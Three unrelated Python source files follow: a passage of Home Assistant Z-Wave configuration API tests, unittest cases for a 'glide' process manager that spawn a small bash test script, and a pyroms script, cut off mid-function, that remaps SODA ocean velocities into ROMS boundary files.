return {"hello.beer": {"free": "beer"}, "other.entity": {"do": "something"}}
with patch("homeassistant.components.config._read", mock_read):
resp = await client.get("/api/config/zwave/device_config/hello.beer")
assert resp.status == 200
result = await resp.json()
assert result == {"free": "beer"}
async def test_update_device_config(client):
"""Test updating device config."""
orig_data = {
"hello.beer": {"ignored": True},
"other.entity": {"polling_intensity": 2},
}
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
):
resp = await client.post(
"/api/config/zwave/device_config/hello.beer",
data=json.dumps({"polling_intensity": 2}),
)
assert resp.status == 200
result = await resp.json()
assert result == {"result": "ok"}
orig_data["hello.beer"]["polling_intensity"] = 2
assert written[0] == orig_data
async def test_update_device_config_invalid_key(client):
"""Test updating device config."""
resp = await client.post(
"/api/config/zwave/device_config/invalid_entity",
data=json.dumps({"polling_intensity": 2}),
)
assert resp.status == 400
async def test_update_device_config_invalid_data(client):
"""Test updating device config."""
resp = await client.post(
"/api/config/zwave/device_config/hello.beer",
data=json.dumps({"invalid_option": 2}),
)
assert resp.status == 400
async def test_update_device_config_invalid_json(client):
"""Test updating device config."""
resp = await client.post(
"/api/config/zwave/device_config/hello.beer", data="not json"
)
assert resp.status == 400
async def test_get_values(hass, client):
"""Test getting values on node."""
node = MockNode(node_id=1)
value = MockValue(
value_id=123456,
node=node,
label="Test Label",
instance=1,
index=2,
poll_intensity=4,
)
values = MockEntityValues(primary=value)
node2 = MockNode(node_id=2)
value2 = MockValue(value_id=234567, node=node2, label="Test Label 2")
values2 = MockEntityValues(primary=value2)
hass.data[const.DATA_ENTITY_VALUES] = [values, values2]
resp = await client.get("/api/zwave/values/1")
assert resp.status == 200
result = await resp.json()
assert result == {
"123456": {
"label": "Test Label",
"instance": 1,
"index": 2,
"poll_intensity": 4,
}
}
async def test_get_groups(hass, client):
"""Test getting groupdata on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=2)
node.groups.associations = "assoc"
node.groups.associations_instances = "inst"
node.groups.label = "the label"
node.groups.max_associations = "max"
node.groups = {1: node.groups}
network.nodes = {2: node}
resp = await client.get("/api/zwave/groups/2")
assert resp.status == 200
result = await resp.json()
assert result == {
"1": {
"association_instances": "inst",
"associations": "assoc",
"label": "the label",
"max_associations": "max",
}
}
async def test_get_groups_nogroups(hass, client):
"""Test getting groupdata on node with no groups."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=2)
network.nodes = {2: node}
resp = await client.get("/api/zwave/groups/2")
assert resp.status == 200
result = await resp.json()
assert result == {}
async def test_get_groups_nonode(hass, client):
"""Test getting groupdata on nonexisting node."""
network = hass.data[DATA_NETWORK] = MagicMock()
network.nodes = {1: 1, 5: 5}
resp = await client.get("/api/zwave/groups/2")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert result == {"message": "Node not found"}
async def test_get_config(hass, client):
"""Test getting config on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=2)
value = MockValue(index=12, command_class=const.COMMAND_CLASS_CONFIGURATION)
value.label = "label"
value.help = "help"
value.type = "type"
value.data = "data"
value.data_items = ["item1", "item2"]
value.max = "max"
value.min = "min"
node.values = {12: value}
network.nodes = {2: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/config/2")
assert resp.status == 200
result = await resp.json()
assert result == {
"12": {
"data": "data",
"data_items": ["item1", "item2"],
"help": "help",
"label": "label",
"max": "max",
"min": "min",
"type": "type",
}
}
async def test_get_config_noconfig_node(hass, client):
"""Test getting config on node without config."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=2)
network.nodes = {2: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/config/2")
assert resp.status == 200
result = await resp.json()
assert result == {}
async def test_get_config_nonode(hass, client):
"""Test getting config on nonexisting node."""
network = hass.data[DATA_NETWORK] = MagicMock()
network.nodes = {1: 1, 5: 5}
resp = await client.get("/api/zwave/config/2")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert result == {"message": "Node not found"}
async def test_get_usercodes_nonode(hass, client):
"""Test getting usercodes on nonexisting node."""
network = hass.data[DATA_NETWORK] = MagicMock()
network.nodes = {1: 1, 5: 5}
resp = await client.get("/api/zwave/usercodes/2")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert result == {"message": "Node not found"}
async def test_get_usercodes(hass, client):
"""Test getting usercodes on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_USER_CODE])
value = MockValue(index=0, command_class=const.COMMAND_CLASS_USER_CODE)
value.genre = const.GENRE_USER
value.label = "label"
value.data = "1234"
node.values = {0: value}
network.nodes = {18: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/usercodes/18")
assert resp.status == 200
result = await resp.json()
assert result == {"0": {"code": "1234", "label": "label", "length": 4}}
async def test_get_usercode_nousercode_node(hass, client):
"""Test getting usercodes on node without usercodes."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18)
network.nodes = {18: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/usercodes/18")
assert resp.status == 200
result = await resp.json()
assert result == {}
async def test_get_usercodes_no_genreuser(hass, client):
"""Test getting usercodes on node missing genre user."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_USER_CODE])
value = MockValue(index=0, command_class=const.COMMAND_CLASS_USER_CODE)
value.genre = const.GENRE_SYSTEM
value.label = "label"
value.data = "1234"
node.values = {0: value}
network.nodes = {18: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/usercodes/18")
assert resp.status == 200
result = await resp.json()
assert result == {}
async def test_save_config_no_network(hass, client):
"""Test saving configuration without network data."""
resp = await client.post("/api/zwave/saveconfig")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert result == {"message": "No Z-Wave network data found"}
async def test_save_config(hass, client):
"""Test saving configuration."""
network = hass.data[DATA_NETWORK] = MagicMock()
resp = await client.post("/api/zwave/saveconfig")
assert resp.status == 200
result = await resp.json()
assert network.write_config.called
assert result == {"message": "Z-Wave configuration saved to file"}
async def test_get_protection_values(hass, client):
"""Test getting protection values on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {18: node}
node.value = value
node.get_protection_item.return_value = "Unprotected"
node.get_protection_items.return_value = value.data_items
node.get_protections.return_value = {value.value_id: "Object"}
resp = await client.get("/api/zwave/protection/18")
assert resp.status == 200
result = await resp.json()
assert node.get_protections.called
assert node.get_protection_item.called
assert node.get_protection_items.called
assert result == {
"value_id": "123456",
"selected": "Unprotected",
"options": ["Unprotected", "Protection by Sequence", "No Operation Possible"],
}
async def test_get_protection_values_nonexisting_node(hass, client):
"""Test getting protection values on node with wrong nodeid."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {17: node}
node.value = value
resp = await client.get("/api/zwave/protection/18")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert not node.get_protections.called
assert not node.get_protection_item.called
assert not node.get_protection_items.called
assert result == {"message": "Node not found"}
async def test_get_protection_values_without_protectionclass(hass, client):
"""Test getting protection values on node without protectionclass."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18)
value = MockValue(value_id=123456, index=0, instance=1)
network.nodes = {18: node}
node.value = value
resp = await client.get("/api/zwave/protection/18")
assert resp.status == 200
result = await resp.json()
assert not node.get_protections.called
assert not node.get_protection_item.called
assert not node.get_protection_items.called
assert result == {}
async def test_set_protection_value(hass, client):
"""Test setting protection value on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {18: node}
node.value = value
resp = await client.post(
"/api/zwave/protection/18",
data=json.dumps({"value_id": "123456", "selection": "Protection by Sequence"}),
)
assert resp.status == 200
result = await resp.json()
assert node.set_protection.called
assert result == {"message": "Protection setting succsessfully set"}
async def test_set_protection_value_failed(hass, client):
"""Test setting protection value failed on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {18: node}
node.value = value
node.set_protection.return_value = False
resp = await client.post(
"/api/zwave/protection/18",
data=json.dumps({"value_id": "123456", "selection": "Protecton by Sequence"}),
)
assert resp.status == 202
result = await resp.json()
assert node.set_protection.called
assert result == {"message": "Protection setting did not complete"}
async def test_set_protection_value_nonexisting_node(hass, client):
"""Test setting protection value on nonexisting node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=17, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {17: node}
node.value = value
node.set_protection.return_value = False
resp = await client.post(
"/api/zwave/protection/18",
data=json.dumps({"value_id": "123456", "selection": "Protecton by Sequence"}),
)
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert not node.set_protection.called
assert result == {"message": "Node not found"}
async def test_set_protection_value_missing_class(hass, client):
"""Test setting protection value on node without protectionclass."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=17)
value = MockValue(value_id=123456, index=0, instance=1)
network.nodes = {17: node}
node.value = value
node.set_protection.return_value = False
resp = await client.post(
"/api/zwave/protection/17",
data=json.dumps({"value_id": "123456", "selection": "Protecton by Sequence"}),
)
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert not node.set_protection.called
assert result == {"message": "No protection commandclass on this node"}
|
|
import asyncore
import unittest
import shutil
import os
import signal
import time
import threading
from glide.process import Process
class Tester(unittest.TestCase):
def setUp(self):
if not os.path.exists('temp'):
os.mkdir('temp')
self.test_file = 'temp/execute.sh'
test_code = """#!/bin/bash
trap 'for i in $(seq 1 $3); do echo "$1-#"; sleep 0.4; done; exit' SIGTERM
for i in `seq 1 20`; do echo $1-$i; sleep $2; done
"""
with open(self.test_file, 'w') as fp:
fp.write(test_code)
# make executable
os.chmod(self.test_file, 0777)
# signal trap
signal.signal(signal.SIGCHLD, self.proc_exit)
self.test_blasted = []
def tearDown(self):
shutil.rmtree('temp')
def proc_exit(self, signum, frame):
pid, exitcode = os.waitpid(-1, os.WNOHANG | os.WUNTRACED)
self.process.cleanup()
def blast_save_to_test_blasted(self, message, index):
self.test_blasted.append('[%s] %s' % (index, message.message,))
def blast_save_process_to_test_blasted(self, message, index):
self.test_blasted.append(str(self.process)[0:36])
def test_normal_execution(self):
"""test output of a normal process"""
self.process = Process(
name='test_execute1',
path=[self.test_file, '1', '0.1', '7'],
max_nl=10,
bm=self.blast_save_to_test_blasted,
try_restart=0,
)
result, message = self.process.start()
self.assertEquals(result, True)
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """[0] 1-1
[1] 1-2
[2] 1-3
[3] 1-4
[4] 1-5
[5] 1-6
[6] 1-7
[7] 1-8
[8] 1-9
[9] 1-10
[10] 1-11
[11] 1-12
[12] 1-13
[13] 1-14
[14] 1-15
[15] 1-16
[16] 1-17
[17] 1-18
[18] 1-19
[19] 1-20""")
def test_sigterm_execution(self):
"""test output of a terminated process"""
self.process = Process(
name='test_execute2',
path=[self.test_file, '2', '0.3', '7'],
max_nl=10,
bm=self.blast_save_to_test_blasted,
try_restart=0,
)
self.process.start()
def send_signal_to_process():
""" signal sigterm to the process """
time.sleep(2)
self.process.terminate()
ssp_thread = threading.Thread(target=send_signal_to_process)
ssp_thread.start()
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """[0] 2-1
[1] 2-2
[2] 2-3
[3] 2-4
[4] 2-5
[5] 2-6
[6] 2-7
[7] 2-#
[8] 2-#
[9] 2-#
[10] 2-#
[11] 2-#
[12] 2-#
[13] 2-#""")
def test_show_status(self):
"""test showing status of the process"""
self.process = Process(
name="text_execute3",
path=[self.test_file, '3', '0.01', '7'],
max_nl=20,
bm=self.blast_save_process_to_test_blasted,
try_restart=0,
)
self.process.start()
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """\
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid""")
def test_restart(self):
self.process = Process(
name="text_execute4",
path=[self.test_file, '4', '0.2', '7'],
max_nl=20,
bm=self.blast_save_to_test_blasted,
try_restart=0,
)
self.process.start()
def send_signal_to_process():
""" signal sigterm to the process """
time.sleep(1)
self.process.restart()
ssp_thread = threading.Thread(target=send_signal_to_process)
ssp_thread.start()
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """\
[0] 4-1
[1] 4-2
[2] 4-3
[3] 4-4
[4] 4-5
[5] 4-#
[6] 4-#
[7] 4-#
[8] 4-#
[9] 4-#
[10] 4-#
[11] 4-#
[12] 4-1
[13] 4-2
[14] 4-3
[15] 4-4
[16] 4-5
[17] 4-6
[18] 4-7
[19] 4-8
[20] 4-9
[21] 4-10
[22] 4-11
[23] 4-12
[24] 4-13
[25] 4-14
[26] 4-15
[27] 4-16
[28] 4-17
[29] 4-18
[30] 4-19
[31] 4-20""")
def test_hanging_process(self):
self.process = Process(
name="text_execute5",
path=[self.test_file, '5', '0.8', '50'],
max_nl=20,
bm=self.blast_save_to_test_blasted,
try_restart=0,
)
self.process.start()
def send_signal_to_process():
""" signal sigterm to the process """
time.sleep(2)
self.process.terminate()
ssp_thread = threading.Thread(target=send_signal_to_process)
ssp_thread.start()
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """\
[0] 5-1
[1] 5-2
[2] 5-3
[3] 5-#
[4] 5-#
[5] 5-#
[6] 5-#
[7] 5-#
[8] 5-#
[9] 5-#
[10] 5-#
[11] 5-#
[12] 5-#
[13] 5-#
[14] 5-#
[15] 5-#
[16] 5-#
[17] 5-#
[18] 5-#
[19] 5-#
[20] 5-#
[21] 5-#
[22] 5-#
[23] 5-#
[24] 5-#
[25] 5-#
[26] 5-#
[27] 5-#
[28] 5-#
[29] 5-#
[30] 5-#
[31] 5-#
[32] 5-#
[33] 5-#
[34] 5-#
[35] 5-#
[36] 5-#
[37] 5-#
[38] 5-#
[39] 5-#
[40] 5-#
[41] 5-#
[42] 5-#
[43] 5-#
[44] 5-#
[45] 5-#
[46] 5-#
[47] 5-#
[48] 5-#
[49] 5-#
[50] 5-#
[51] 5-#
[52] 5-#""")
|
|
import numpy as np
import os
try:
import netCDF4 as netCDF
except:
import netCDF3 as netCDF
import matplotlib.pyplot as plt
import time
from datetime import datetime
from matplotlib.dates import date2num, num2date
import pyroms
import pyroms_toolbox
import _remapping
class nctime(object):
pass
def remap_bdry_uv(src_file, src_grd, dst_grd, dmax=0, cdepth=0, kk=0, dst_dir='./'):
# YELLOW grid sub-sample
xrange=(225, 275); yrange=(190, 240)
# get time
nctime.long_name = 'time'
nctime.units = 'days since 1900-01-01 00:00:00'
# time reference "days since 1900-01-01 00:00:00"
ref = datetime(1900, 1, 1, 0, 0, 0)
ref = date2num(ref)
tag = src_file.rsplit('/')[-1].rsplit('_')[-1].rsplit('-')[0]
year = int(tag[:4])
month = int(tag[4:6])
day = int(tag[6:])
time = datetime(year, month, day, 0, 0, 0)
time = date2num(time)
time = time - ref
time = time + 2.5 # 5-day average
# get dimensions
Mp, Lp = dst_grd.hgrid.mask_rho.shape
# create destination file
dst_file = src_file.rsplit('/')[-1]
dst_fileu = dst_dir + dst_file[:-4] + '_u_bdry_' + dst_grd.name + '.nc'
print '\nCreating destination file', dst_fileu
if os.path.exists(dst_fileu) is True:
os.remove(dst_fileu)
pyroms_toolbox.nc_create_roms_file(dst_fileu, dst_grd, nctime)
dst_filev = dst_dir + dst_file[:-4] + '_v_bdry_' + dst_grd.name + '.nc'
print 'Creating destination file', dst_filev
if os.path.exists(dst_filev) is True:
os.remove(dst_filev)
pyroms_toolbox.nc_create_roms_file(dst_filev, dst_grd, nctime)
# open destination file
ncu = netCDF.Dataset(dst_fileu, 'a', format='NETCDF3_CLASSIC')
ncv = netCDF.Dataset(dst_filev, 'a', format='NETCDF3_CLASSIC')
#load var
cdf = netCDF.Dataset(src_file)
src_varu = cdf.variables['u']
src_varv = cdf.variables['v']
#get missing value
spval = src_varu._FillValue
# YELLOW grid sub-sample
src_varu = src_varu[:, yrange[0]:yrange[1]+1, xrange[0]:xrange[1]+1]
src_varv = src_varv[:, yrange[0]:yrange[1]+1, xrange[0]:xrange[1]+1]
# get weights file
wts_file = 'remap_weights_SODA_2.1.6_to_YELLOW_bilinear_uv_to_rho.nc'
# build intermediate zgrid
zlevel = -src_grd.z_t[::-1,0,0]
nzlevel = len(zlevel)
dst_zcoord = pyroms.vgrid.z_coordinate(dst_grd.vgrid.h, zlevel, nzlevel)
dst_grdz = pyroms.grid.ROMS_Grid(dst_grd.name+'_Z', dst_grd.hgrid, dst_zcoord)
# create variable in destination file
print 'Creating variable u_north'
ncu.createVariable('u_north', 'f8', ('ocean_time', 's_rho', 'xi_u'), fill_value=spval)
ncu.variables['u_north'].long_name = '3D u-momentum north boundary condition'
ncu.variables['u_north'].units = 'meter second-1'
ncu.variables['u_north'].field = 'u_north, scalar, series'
print 'Creating variable u_south'
ncu.createVariable('u_south', 'f8', ('ocean_time', 's_rho', 'xi_u'), fill_value=spval)
ncu.variables['u_south'].long_name = '3D u-momentum south boundary condition'
ncu.variables['u_south'].units = 'meter second-1'
ncu.variables['u_south'].field = 'u_south, scalar, series'
print 'Creating variable u_east'
ncu.createVariable('u_east', 'f8', ('ocean_time', 's_rho', 'eta_u'), fill_value=spval)
ncu.variables['u_east'].long_name = '3D u-momentum east boundary condition'
ncu.variables['u_east'].units = 'meter second-1'
ncu.variables['u_east'].field = 'u_east, scalar, series'
print 'Creating variable u_west'
ncu.createVariable('u_west', 'f8', ('ocean_time', 's_rho', 'eta_u'), fill_value=spval)
ncu.variables['u_west'].long_name = '3D u-momentum west boundary condition'
ncu.variables['u_west'].units = 'meter second-1'
ncu.variables['u_west'].field = 'u_east, scalar, series'
# create variable in destination file
print 'Creating variable ubar_north'
ncu.createVariable('ubar_north', 'f8', ('ocean_time', 'xi_u'), fill_value=spval)
ncu.variables['ubar_north'].long_name = '2D u-momentum north boundary condition'
ncu.variables['ubar_north'].units = 'meter second-1'
ncu.variables['ubar_north'].field = 'ubar_north, scalar, series'
print 'Creating variable ubar_south'
ncu.createVariable('ubar_south', 'f8', ('ocean_time', 'xi_u'), fill_value=spval)
ncu.variables['ubar_south'].long_name = '2D u-momentum south boundary condition'
ncu.variables['ubar_south'].units = 'meter second-1'
ncu.variables['ubar_south'].field = 'ubar_south, scalar, series'
print 'Creating variable ubar_east'
ncu.createVariable('ubar_east', 'f8', ('ocean_time', 'eta_u'), fill_value=spval)
ncu.variables['ubar_east'].long_name = '2D u-momentum east boundary condition'
ncu.variables['ubar_east'].units = 'meter second-1'
ncu.variables['ubar_east'].field = 'ubar_east, scalar, series'
print 'Creating variable ubar_west'
ncu.createVariable('ubar_west', 'f8', ('ocean_time', 'eta_u'), fill_value=spval)
ncu.variables['ubar_west'].long_name = '2D u-momentum west boundary condition'
ncu.variables['ubar_west'].units = 'meter second-1'
ncu.variables['ubar_west'].field = 'ubar_east, scalar, series'
print 'Creating variable v_north'
ncv.createVariable('v_north', 'f8', ('ocean_time', 's_rho', 'xi_v'), fill_value=spval)
ncv.variables['v_north'].long_name = '3D v-momentum north boundary condition'
ncv.variables['v_north'].units = 'meter second-1'
ncv.variables['v_north'].field = 'v_north, scalar, series'
print 'Creating variable v_south'
ncv.createVariable('v_south', 'f8', ('ocean_time', 's_rho', 'xi_v'), fill_value=spval)
ncv.variables['v_south'].long_name = '3D v-momentum south boundary condition'
ncv.variables['v_south'].units = 'meter second-1'
ncv.variables['v_south'].field = 'v_south, scalar, series'
print 'Creating variable v_east'
ncv.createVariable('v_east', 'f8', ('ocean_time', 's_rho', 'eta_v'), fill_value=spval)
ncv.variables['v_east'].long_name = '3D v-momentum east boundary condition'
ncv.variables['v_east'].units = 'meter second-1'
ncv.variables['v_east'].field = 'v_east, scalar, series'
print 'Creating variable v_west'
ncv.createVariable('v_west', 'f8', ('ocean_time', 's_rho', 'eta_v'), fill_value=spval)
ncv.variables['v_west'].long_name = '3D v-momentum west boundary condition'
ncv.variables['v_west'].units = 'meter second-1'
ncv.variables['v_west'].field = 'v_east, scalar, series'
print 'Creating variable vbar_north'
ncv.createVariable('vbar_north', 'f8', ('ocean_time', 'xi_v'), fill_value=spval)
ncv.variables['vbar_north'].long_name = '2D v-momentum north boundary condition'
ncv.variables['vbar_north'].units = 'meter second-1'
ncv.variables['vbar_north'].field = 'vbar_north, scalar, series'
print 'Creating variable vbar_south'
ncv.createVariable('vbar_south', 'f8', ('ocean_time', 'xi_v'), fill_value=spval)
ncv.variables['vbar_south'].long_name = '2D v-momentum south boundary condition'
ncv.variables['vbar_south'].units = 'meter second-1'
ncv.variables['vbar_south'].field = 'vbar_south, scalar, series'
print 'Creating variable vbar_east'
ncv.createVariable('vbar_east', 'f8', ('ocean_time', 'eta_v'), fill_value=spval)
ncv.variables['vbar_east'].long_name = '2D v-momentum east boundary condition'
ncv.variables['vbar_east'].units = 'meter second-1'
ncv.variables['vbar_east'].field = 'vbar_east, scalar, series'
print 'Creating variable vbar_west'
ncv.createVariable('vbar_west', 'f8', ('ocean_time', 'eta_v'), fill_value=spval)
ncv.variables['vbar_west'].long_name = '2D v-momentum west boundary condition'
ncv.variables['vbar_west'].units = 'meter second-1'
ncv.variables['vbar_west'].field = 'vbar_east, scalar, series'
# remaping
print 'remapping and rotating u and v from', src_grd.name, \
'to', dst_grd.name
print 'time =', time
# flood the grid
print 'flood the grid'
src_uz = pyroms_toolbox.BGrid_SODA.flood(src_varu, src_grd, Bpos='uv', \
spval=spval, dmax=dmax, cdepth=cdepth, kk=kk)
src_vz = pyroms_toolbox.BGrid_SODA.flood(src_varv, src_grd, Bpos='uv', \
spval=spval, dmax=dmax, cdepth=cdepth, kk=kk)
# horizontal interpolation using scrip weights
print 'horizontal interpolation using scrip weights'
dst_uz = pyroms.remapping.remap(src_uz, wts_file, \
spval=spval)
dst_vz = pyroms.remapping.remap(src_vz, wts_file, \
spval=spval)
# vertical interpolation from standard z level to sigma
print 'vertical interpolation from standard z level to sigma'
dst_u_north = pyroms.remapping.z2roms(dst_uz[::-1, Mp-2:Mp, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(Mp-2,Mp))
dst_u_south = pyroms.remapping.z2roms(dst_uz[::-1, 0:2, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(0,2))
dst_u_east = pyroms.remapping.z2roms(dst_uz[::-1, 0:Mp, Lp-2:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(Lp-2,Lp), jrange=(0,Mp))
dst_u_west = pyroms.remapping.z2roms(dst_uz[::-1, 0:Mp, 0:2], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,2), jrange=(0,Mp))
dst_v_north = pyroms.remapping.z2roms(dst_vz[::-1, Mp-2:Mp, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(Mp-2,Mp))
dst_v_south = pyroms.remapping.z2roms(dst_vz[::-1, 0:2, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(0,2))
dst_v_east = pyroms.remapping.z2roms(dst_vz[::-1, 0:Mp, Lp-2:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(Lp-2,Lp), jrange=(0,Mp))
dst_v_west = pyroms.remapping.z2roms(dst_vz[::-1, 0:Mp, 0:2], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,2), jrange=(0,Mp))
# rotate u,v fields
wtsfile = 'remap_weights_GFDL_CM2.1_to_NEP5_bilinear_t_to_rho.nc'
src_angle = np.zeros(dst_grd.hgrid.angle_rho.shape)
dst_angle = dst_grd.hgrid.angle_rho
angle = dst_angle - src_angle
angle = np.tile(angle, (dst_grd.vgrid.N, 1, 1))
U_north = dst_u_north + dst_v_north*1j
eitheta_north = np.exp(-1j*angle[:,Mp-2:Mp, 0:Lp])
U_north = U_north * eitheta_north
dst_u_north = np.real(U_north)
dst_v_north = np.imag(U_north)
U_south = dst_u_south + dst_v_south*1j
eitheta_south = np.exp(-1j*angle[:,0:2, 0:Lp])
U_south = U_south * eitheta_south
dst_u_south = np.real(U_south)
dst_v_south = np.imag(U_south)
U_east = dst_u_east + dst_v_east*1j
eitheta_east = np.exp(-1j*angle[:,0:Mp, Lp-2:Lp])
U_east = U_east * eitheta_east
dst_u_east = np.real(U_east)
dst_v_east = np.imag(U_east)
U_west = dst_u_west + dst_v_west*1j
eitheta_west = np.exp(-1j*angle[:,0:Mp, 0:2])
U_west = U_west * eitheta_west
dst_u_west = np.real(U_west)
dst_v_west = np.imag(U_west)
# move back to u,v points
dst_u_north = 0.5 * np.squeeze(dst_u_north[:,-1,:-1] + dst_u_north[:,-1,1:])
dst_v_north = 0.5 * np.squeeze(dst_v_north[:,:-1,:] + dst_v_north[:,1:,:])
dst_u_south = 0.5 * np.squeeze(dst_u_south[:,0,:-1] + dst_u_south[:,0,1:])
dst_v_south = 0.5 * np.squeeze(dst_v_south[:,:-1,:] + dst_v_south[:,1:,:])
dst_u_east = 0.5 * np.squeeze(dst_u_east[:,:,:-1] + dst_u_east[:,:,1:])
dst_v_east = 0.5 * np.squeeze(dst_v_east[:,:-1,-1] + dst_v_east[:,1:,-1])
dst_u_west = 0.5 * np.squeeze(dst_u_west[:,:,:-1] + dst_u_west[:,:,1:])
dst_v_west = 0.5 * np.squeeze(dst_v_west[:,:-1,0] + dst_v_west[:,1:,0])
# spval
idxu_north = np.where(dst_grd.hgrid.mask_u[-1,:] == 0)
idxv_north = np.where(dst_grd.hgrid.mask_v[-1,:] == 0)
idxu_south = np.where(dst_grd.hgrid.mask_u[0,:] == 0)
idxv_south = np.where(dst_grd.hgrid.mask_v[0,:] == 0)
idxu_east = np.where(dst_grd.hgrid.mask_u[:,-1] == 0)
idxv_east = np.where(dst_grd.hgrid.mask_v[:,-1] == 0)
idxu_west = np.where(dst_grd.hgrid.mask_u[:,0] == 0)
idxv_west = np.where(dst_grd.hgrid.mask_v[:,0] == 0)
for n in range(dst_grd.vgrid.N):
dst_u_north[n, idxu_north[0]] = spval
dst_v_north[n, idxv_north[0]] = spval
dst_u_south[n, idxu_south[0]] = spval
dst_v_south[n, idxv_south[0]] = spval
dst_u_east[n, idxu_east[0]] = spval
dst_v_east[n, idxv_east[0]] = spval
dst_u_west[n, idxu_west[0]] = spval
dst_v_west[n, idxv_west[0]] = spval
# compute depth average velocity ubar and vbar
# get z at the right position
z_u_north = 0.5 * (dst_grd.vgrid.z_w[0,:,-1,:-1] + dst_grd.vgrid.z_w[0,:,-1,1:])
z_v_north = 0.5 * (dst_grd.vgrid.z_w[0,:,-1,:] + dst_grd.vgrid.z_w[0,:,-2,:])
z_u_south = 0.5 * (dst_grd.vgrid.z_w[0,:,0,:-1] + dst_grd.vgrid.z_w[0,:,0,1:])
z_v_south = 0.5 * (dst_grd.vgrid.z_w[0,:,0,:] + dst_grd.vgrid.z_w[0,:,1,:])
z_u_east = 0.5 * (dst_grd.vgrid.z_w[0,:,:,-1] + dst_grd.vgrid.z_w[0,:,:,-2])
